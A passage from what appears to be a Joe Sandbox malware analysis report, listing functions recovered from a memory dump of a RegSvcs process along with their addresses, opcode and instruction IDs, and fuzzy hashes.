                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: ed51584d55bd98cf655ae9a63773f62b99e94eb3dadb5039d3e7bd883f68f519
                                                                                            • Instruction ID: bcbf505dfe7bb2dd096f3f8ef110fd4318c178522f38f07c5a76187d4b3d979e
                                                                                            • Opcode Fuzzy Hash: ed51584d55bd98cf655ae9a63773f62b99e94eb3dadb5039d3e7bd883f68f519
                                                                                            • Instruction Fuzzy Hash: 955157B16083019FD754DF29C881AABBBE5BFC8714F44892DF589C7264EB38DA05CB52
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00F945B1 Relevance: .2, Instructions: 156COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 0d00e1a585e90d849ff2aa0c284c489e35fe4af6d50ef2092e2439a8439fa3dd
                                                                                            • Instruction ID: e44cdcf19d0ef0382ef9bd56de3bb5ca4ac8faded371b6d40aaccbfd46f96dde
                                                                                            • Opcode Fuzzy Hash: 0d00e1a585e90d849ff2aa0c284c489e35fe4af6d50ef2092e2439a8439fa3dd
                                                                                            • Instruction Fuzzy Hash: C351AD71E0021EABEF15DF94C841FEEBBB6AF45710F05406AE900AB240D734EE45DBA1
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00FFE9E0 Relevance: .2, Instructions: 154COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID: InitializeThunk
                                                                                            • String ID:
                                                                                            • API String ID: 2994545307-0
                                                                                            • Opcode ID: b631fe1f52208cb18c131e5291272d5615ec6cd8030edbb8dd5fe07777775a1e
                                                                                            • Instruction ID: 1b14c9ec3f86789d78714512dbea72bf6c32fbbeca35a297cd3c5ab1294df48d
                                                                                            • Opcode Fuzzy Hash: b631fe1f52208cb18c131e5291272d5615ec6cd8030edbb8dd5fe07777775a1e
                                                                                            • Instruction Fuzzy Hash: 7F51C432D0021DEFDF219E90CC81BBEB775AF40724F254665EB12672B1D7749E40AB90
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 01014978 Relevance: .2, Instructions: 153COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 2ee4ed937ca29d41b5e9e6a25ad246edd4a882bebb87fe29e31670e6949dfa8a
                                                                                            • Instruction ID: b71d5c7babe7a42c0d9c2a3983f0d8f7dfe9c21f1e58026e7928e7b04146c58d
                                                                                            • Opcode Fuzzy Hash: 2ee4ed937ca29d41b5e9e6a25ad246edd4a882bebb87fe29e31670e6949dfa8a
                                                                                            • Instruction Fuzzy Hash: 9F519072D002299BDF10DF99D880AEEBBB4BF04B10F05416AFA55FB265D77C9901CBA4
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 01038B28 Relevance: .2, Instructions: 152COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 3e8ee446b1013331faf92a95840465453371dc3641018faaba26ec6d5a7b3fdb
                                                                                            • Instruction ID: f498e7b1536e3f8c924ad4162ae46b83e892e4052f2cbabc676f7481d2d8e419
                                                                                            • Opcode Fuzzy Hash: 3e8ee446b1013331faf92a95840465453371dc3641018faaba26ec6d5a7b3fdb
                                                                                            • Instruction Fuzzy Hash: E241D1707056069BDA69DB2DC894B7BBBDEEFD0220F18C39AF9D587281DB34D901C690
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00F8E627 Relevance: .1, Instructions: 148COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 87340800007112036a740971f45ea189d7afece99369c276f5d6e6437ae9c56d
                                                                                            • Instruction ID: dbf496ed565ff6bdcb8c2c5ff66d7f19be5648c74e8913bb0566e373a26e585b
                                                                                            • Opcode Fuzzy Hash: 87340800007112036a740971f45ea189d7afece99369c276f5d6e6437ae9c56d
                                                                                            • Instruction Fuzzy Hash: AA4192729083129BD710FB75CC41BAFB7D8AF88B14F440929F9A4E7180E678D904A797
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00FFCBF0 Relevance: .1, Instructions: 148COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 842f617e47e800bf49b8121f192618748c81f0c134132832e08e6780f5339e6c
                                                                                            • Instruction ID: 7f4d9ca66ebc9c0ec74bc5059d20d64d54768264e5281e2b59497965d3c9a915
                                                                                            • Opcode Fuzzy Hash: 842f617e47e800bf49b8121f192618748c81f0c134132832e08e6780f5339e6c
                                                                                            • Instruction Fuzzy Hash: 4251AE72D0022DDFCB20DFA9CA809AEB7B9FF48324B118529E655A7311D735AD01DBD0
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0103A9D3 Relevance: .1, Instructions: 139COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 7622aca86cac28a0acf118705f69cf0cc3cb486fddc0e93dd45dfd5b9ea80ff7
                                                                                            • Instruction ID: 15214970d30a382ba5fb9634a0af7db741486ee41eb6a8405b6cf11bdd6d9427
                                                                                            • Opcode Fuzzy Hash: 7622aca86cac28a0acf118705f69cf0cc3cb486fddc0e93dd45dfd5b9ea80ff7
                                                                                            • Instruction Fuzzy Hash: 4441B432704A169FDB29DE58C980A6AB7EDFBC4210B05466EE9D287641EB34ED05C790
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00FA01F8 Relevance: .1, Instructions: 138COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: bb83bbebbc500af5173f01e731d465b3a86dddca3970dcd72e33b27e6231fccd
                                                                                            • Instruction ID: da8168379567807bb0953619e6c6a8de24332fd94e139fbc22f583799e33d94e
                                                                                            • Opcode Fuzzy Hash: bb83bbebbc500af5173f01e731d465b3a86dddca3970dcd72e33b27e6231fccd
                                                                                            • Instruction Fuzzy Hash: 31419CB6D002199BCF14DF98D840BEEB7B4BF4A710F14816AE815E7250DB359D41EBA4
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00FB2750 Relevance: .1, Instructions: 137COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: f9143dc9ab32c0c56755980999bbdd100a6c23c33ec6549c8632214e05dba9ed
                                                                                            • Instruction ID: c09a2ebdec1378ac2b7612f67a134b7fbbd260ed569861197a60c5a9d83aed23
                                                                                            • Opcode Fuzzy Hash: f9143dc9ab32c0c56755980999bbdd100a6c23c33ec6549c8632214e05dba9ed
                                                                                            • Instruction Fuzzy Hash: 36515B75E00259CFCB14CF99C480AAEF7B2FF84720F2481A9D855A7390E770AE42DB91
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00F76154 Relevance: .1, Instructions: 133COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 3cb288ffb4e333416e143517b08f252aab2f05c350fe5e6f3b8f054a87b39c9a
                                                                                            • Instruction ID: e2d7bd64b2b6fd296a840ce0a96f098f6a7a5a07ef9235882dfde0cadbe35f42
                                                                                            • Opcode Fuzzy Hash: 3cb288ffb4e333416e143517b08f252aab2f05c350fe5e6f3b8f054a87b39c9a
                                                                                            • Instruction Fuzzy Hash: 225104709005169FCB659B64CC01BE8B7B1EF05324F1882AAE419E72D2EB799D81EF81
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0103866E Relevance: .1, Instructions: 129COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 52a1741bb7668dbd0e330b4cee233e7836a49f18a3e4eafb0fad66dd8014cf6e
                                                                                            • Instruction ID: 160e59147225fa6e72358917e4b8f422fdf6998cf7968d67d7642d324e024da2
                                                                                            • Opcode Fuzzy Hash: 52a1741bb7668dbd0e330b4cee233e7836a49f18a3e4eafb0fad66dd8014cf6e
                                                                                            • Instruction Fuzzy Hash: 0F41A475B00205ABDB19DB99CC84AAFBBBEBFC8600F1481EAF580A7341D674DD008760
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00FEC730 Relevance: .1, Instructions: 129COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 538a9ebe78966fc29669d55dd7d7c31bb531b59d933a3b4feb1395b131f31a37
                                                                                            • Instruction ID: 927aa526cdd25b93dabb06059406cfb21675ec6feaaee3a1ea90e8209784d779
                                                                                            • Opcode Fuzzy Hash: 538a9ebe78966fc29669d55dd7d7c31bb531b59d933a3b4feb1395b131f31a37
                                                                                            • Instruction Fuzzy Hash: 594180F1D0026CABDB20DA61CD81FDEB77CAB45714F0045A5FA08AB141DB749E899FE4
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00F70887 Relevance: .1, Instructions: 128COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 0551453d39e2a6d46ec869bed5716aa624b720a5ff05aa9d39202866bfcba902
                                                                                            • Instruction ID: 80aaa06d518b8f53159b7e0aa720e0dd5735eba83c78e37c293ee437ca9545e8
                                                                                            • Opcode Fuzzy Hash: 0551453d39e2a6d46ec869bed5716aa624b720a5ff05aa9d39202866bfcba902
                                                                                            • Instruction Fuzzy Hash: 2941B1B1600701DFD724DF24C980A26B7F5FF49314B108A6EE54A87B52EB35F845EB91
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00F9A470 Relevance: .1, Instructions: 127COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 4b8b1a8934ed3c5e89fbdf19ee2edb3cdc1a675f62c92d70a862561a322bdb3a
                                                                                            • Instruction ID: 6eca79b0741446de5899e21489fa45ba2ef4056231003584c171355173ea0d05
                                                                                            • Opcode Fuzzy Hash: 4b8b1a8934ed3c5e89fbdf19ee2edb3cdc1a675f62c92d70a862561a322bdb3a
                                                                                            • Instruction Fuzzy Hash: E141C132A40204CFEF25DF68D8957EE77F1FB18320F190196D411AB2A2DB799D00EBA1
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00F78BF0 Relevance: .1, Instructions: 124COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 37ce573338b72f1d667c8bbdeea4b80421d145faeb5af119a26aff6ae52aa25a
                                                                                            • Instruction ID: bf6d4ed2cb8242df413756a99aa72982f0923e94ec076cfbc90bf1f16f7d3a78
                                                                                            • Opcode Fuzzy Hash: 37ce573338b72f1d667c8bbdeea4b80421d145faeb5af119a26aff6ae52aa25a
                                                                                            • Instruction Fuzzy Hash: 97411432A40201CBD725DF58C885B9AB7B6FB94754F24C02BE8059B356CB79DD02EBE1
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00F68918 Relevance: .1, Instructions: 123COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 608432d57d6a30322a000fd52ee3884c745b43fdb1de2286b4c916d0e1b272e0
                                                                                            • Instruction ID: 7761515d245f76f55d152d744bb8477089599b702812a8c5640c31ee69a09ae3
                                                                                            • Opcode Fuzzy Hash: 608432d57d6a30322a000fd52ee3884c745b43fdb1de2286b4c916d0e1b272e0
                                                                                            • Instruction Fuzzy Hash: 1E419D725087169EE311DF64C942B6BB7E8EF84B94F00092EF980D7250EB31DE05AB93
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00F6A020 Relevance: .1, Instructions: 122COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 165ca662f4b1c8196e57a2c4173bd848e06efaa623a98917432a96e6c9651090
                                                                                            • Instruction ID: dc120748bee34f3d728e62920ab714d2f4ecec1678ff694a71723c8c1aaca336
                                                                                            • Opcode Fuzzy Hash: 165ca662f4b1c8196e57a2c4173bd848e06efaa623a98917432a96e6c9651090
                                                                                            • Instruction Fuzzy Hash: 92413B36E04212EBDB10DEA48943BBAB771EF50724F25806EE845AB345D7359D40FF92
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00F709AD Relevance: .1, Instructions: 122COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 13a93e74c67512b65e636575e3bba9834875976f309a0480c4044afe31c86b28
